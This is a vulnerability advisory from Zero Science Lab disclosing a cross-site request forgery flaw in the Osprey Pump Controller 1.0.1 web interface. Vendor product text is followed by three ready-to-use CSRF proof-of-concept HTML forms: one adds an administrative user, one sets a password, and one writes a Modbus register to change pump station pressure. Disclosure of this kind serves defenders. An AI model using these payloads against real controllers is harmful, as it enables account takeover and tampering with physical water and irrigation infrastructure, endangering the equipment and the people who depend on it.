Osprey Pump Controller 1.0.1 Cross Site Request Forgery

<!--Osprey Pump Controller 1.0.1 Cross-Site Request ForgeryVendor: ProPump and Controls, Inc.Product web page: https://www.propumpservice.com | https://www.pumpstationparts.comAffected version: Software Build ID 20211018, Production 10/18/2021                  Mirage App: MirageAppManager, Release [1.0.1]                  Mirage Model 1, RetroBoard IISummary: Providing pumping systems and automated controls forgolf courses and turf irrigation, municipal water and sewer,biogas, agricultural, and industrial markets. Osprey: door-mounted,irrigation and landscape pump controller.Technology hasn't changed dramatically on pump and electric motorsin the last 30 years. Pump station controls are a different story.More than ever before, customers expect the smooth and efficientoperation of VFD control. Communications—monitoring, remote control,and interfacing with irrigation computer programs—have become commonrequirements. Fast and reliable accessibility through cell phoneshas been a game changer.ProPump & Controls can handle any of your retrofit needs, from upgradingan older relay logic system to a powerful modern PLC controller, toconverting your fixed speed or first generation VFD control system tothe latest control platform with communications capabilities.We use a variety of solutions, from MCI-Flowtronex and Watertronicspackage panels to sophisticated SCADA systems capable of controllingand monitoring networks of hundreds of pump stations, valves, tanks,deep wells, or remote flow meters.User friendly system navigation allows quick and easy access to allcritical pump station information with no password protection unlessrequested by the customer. Easy to understand control terminology allowsany qualified pump technician the ability to make basic changes withoutsupport. Similar control and navigation platform compared to one of themost recognized golf pump station control systems for the last twentyyears make it familiar to established golf service groups nationwide.Reliable push button navigation and LCD information screen allows theuse of all existing control panel door switches to eliminate the commonproblems associated with touchscreens.Global system configuration possibilities allow it to be adapted tovirtually any PLC or relay logic controlled pump stations being used inthe industrial, municipal, agricultural and golf markets that operatevariable or fixed speed. On board Wi-Fi and available cellular modemoption allows complete remote access.Desc: The application interface allows users to perform certain actionsvia HTTP requests without performing any validity checks to verify therequests. This can be exploited to perform certain actions with administrativeprivileges if a logged-in user visits a malicious web site.Tested on: Apache/2.4.25 (Raspbian)           Raspbian GNU/Linux 9 (stretch)           GNU/Linux 4.14.79-v7+ (armv7l)           Python 2.7.13 [GCC 6.3.0 20170516]           GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git           PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5753Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5753.php05.01.2023-->CSRF Add User:--------------<html>  <body>    <form action="http://TARGET/setSystemText.php">      <input type="hidden" name="sysTextValue" value="test" />      <input type="hidden" name="sysTextName" value="USERNAME1" />      <input type="hidden" name="backTargetLinkNumber" value="75" />      <input type="hidden" name="userName" value="ZSL" />      <input type="submit" value="Add user" />    </form>  </body></html>CSRF Set Password:------------------<html>  <body>    <form action="http://TARGET/setSystemText.php">      <input type="hidden" name="sysTextValue" value="pass" />      <input type="hidden" name="sysTextName" value="USERPW1" />      <input type="hidden" name="backTargetLinkNumber" value="75" />      <input type="hidden" name="userName" value="t00t" />      <input type="submit" value="Set pass" />    </form>  </body></html>CSRF Set System Pressure Raw:-----------------------------<html>  <body>    <form action="http://TARGET/mbSetRegister_Int.php">      <input type="hidden" name="regValue" value="17301" />      <input type="hidden" name="regAddress" value="40900" />      <input type="hidden" name="minValue" value="0" />      <input type="hidden" name="maxValue" value="32767" />      <input type="hidden" name="backTargetLinkNumber" value="414" />      <input type="hidden" name="userName" value="w00t" />      <input type="submit" value="Modify pressure" />    </form>  </body></html>